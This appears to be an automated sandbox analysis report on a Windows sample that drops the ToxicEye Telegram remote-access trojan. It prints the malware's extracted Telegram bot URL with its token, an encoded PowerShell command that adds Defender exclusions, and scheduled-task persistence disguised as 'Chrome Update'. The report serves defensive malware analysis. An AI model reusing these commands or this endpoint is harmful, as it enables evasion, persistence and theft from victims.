Analysis
-
max time kernel
57s -
max time network
65s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
06-10-2024 21:12
Static task
static1
Behavioral task
behavioral1
Sample
J9cvjahsghfAP2s.exe
Resource
win10-20240611-en
General
-
Target
J9cvjahsghfAP2s.exe
-
Size
16.3MB
-
MD5
0392831eef744779930426841e250ec0
-
SHA1
f9d7d82a92bdc7c8598d393edae73ca1b6ed015e
-
SHA256
a65b1b62f767ef61e1711c0a83157c1e1d01e0c2eace65e616c837fc1e44dbe7
-
SHA512
dbd9e9020ba51db9a71cd435894581e3f1260436cf7690783df00917bce815a2bec45c85592c16eb5aa75937c6cbcd1959f4d95de510cc3174945d3186f74b42
-
SSDEEP
393216:914I2ZOl6M5PdlNYHeWcHXe0xE6TNJWAikay8d+Lc0xk3S1vk:b4I2bM9dlN+XsXesESJWZd+LFki1
Malware Config
Extracted
toxiceye
https://api.telegram.org/bot7642478923:AAEwlRnbjjNP8kHPrxLhm3a8vkSUNuUfWL0/sendMessage?chat_id=7824954161
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GcYPoQg2gjwx.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GcYPoQg2gjwx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GcYPoQg2gjwx.exe -
Executes dropped EXE 3 IoCs
pid Process 3852 TelegramRAT.exe 3272 GcYPoQg2gjwx.exe 2264 rat.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GcYPoQg2gjwx.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3180 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language J9cvjahsghfAP2s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3260 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4404 schtasks.exe 684 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2264 rat.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 3848 powershell.exe 3848 powershell.exe 3848 powershell.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe 2264 rat.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3852 TelegramRAT.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeDebugPrivilege 3180 tasklist.exe Token: SeDebugPrivilege 2264 rat.exe Token: SeDebugPrivilege 2264 rat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2264 rat.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1384 wrote to memory of 3848 1384 J9cvjahsghfAP2s.exe 70 PID 1384 wrote to memory of 3848 1384 J9cvjahsghfAP2s.exe 70 PID 1384 wrote to memory of 3848 1384 J9cvjahsghfAP2s.exe 70 PID 1384 wrote to memory of 3852 1384 J9cvjahsghfAP2s.exe 72 PID 1384 wrote to memory of 3852 1384 J9cvjahsghfAP2s.exe 72 PID 1384 wrote to memory of 3272 1384 J9cvjahsghfAP2s.exe 74 PID 1384 wrote to memory of 3272 1384 J9cvjahsghfAP2s.exe 74 PID 3852 wrote to memory of 4404 3852 TelegramRAT.exe 76 PID 3852 wrote to memory of 4404 3852 TelegramRAT.exe 76 PID 3852 wrote to memory of 4644 3852 TelegramRAT.exe 78 PID 3852 wrote to memory of 4644 3852 TelegramRAT.exe 78 PID 4644 wrote to memory of 3180 4644 cmd.exe 82 PID 4644 wrote to memory of 3180 4644 cmd.exe 82 PID 4644 wrote to memory of 60 4644 cmd.exe 83 PID 4644 wrote to memory of 60 4644 cmd.exe 83 PID 4644 wrote to memory of 3260 4644 cmd.exe 84 PID 4644 wrote to memory of 3260 4644 cmd.exe 84 PID 4644 wrote to memory of 2264 4644 cmd.exe 85 PID 4644 wrote to memory of 2264 4644 cmd.exe 85 PID 2264 wrote to memory of 684 2264 rat.exe 87 PID 2264 wrote to memory of 684 2264 rat.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\J9cvjahsghfAP2s.exe"C:\Users\Admin\AppData\Local\Temp\J9cvjahsghfAP2s.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZwByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcABrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYwBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AdABiACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF1F1.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF1F1.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 3852"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:60
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:3260
-
-
C:\Users\ToxicEye\rat.exe"rat.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\GcYPoQg2gjwx.exe"C:\Users\Admin\AppData\Local\Temp\GcYPoQg2gjwx.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3272
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Obfuscated Files or Information
1Command Obfuscation
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16.2MB
MD5a2cfaecd80aaa319d36ed1c87fc68dce
SHA1d0478f4274090e27fef08869682f7d181bdfdeba
SHA256cab0c3b7a76fe7356253ed309512908ad769068ad57e61a7ee9ea78586750d81
SHA5123233b9c768b7314eebda5b31dce4d4e0160f58b0b750402fcb848c585a74e2d923992952ce20384dc821b788a5acafa6b8e46030d9bdde9328df480391db2fb2
-
Filesize
111KB
MD5cfcf85d457ace60923e67ce7f14adadf
SHA176f9220c256579361542cddde951d6cbb86ca163
SHA2560a2ea2ae3535420da3b3504d3dc9f45067e55c81c3d4e2d483173e05db0fdd3f
SHA512d2554907ea6f236bfefce0c09dcf1a90a171455038b1bc671eeac787938fea1ed7783954550489d6b0375fd9a2a0c794f728c1d81d79fe6600080de4739ab984
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
188B
MD5c3137d62f6011fef44e6be846eabfee3
SHA1bd61de06947d377301bd0714fa4baa0b0ccc317e
SHA2569fdfe7e8ff8d3f4879960c3e5bc262a5766cafd12d85b6c021046b20defbc863
SHA512ba4623ce7436d420c6bdb4e37994f62a082264ef1468b8c7d5e46e1deb23e04973d70faf9f56d7d2d74be1853a4321a0c26dadce5baf36ea30cadd5af054fd40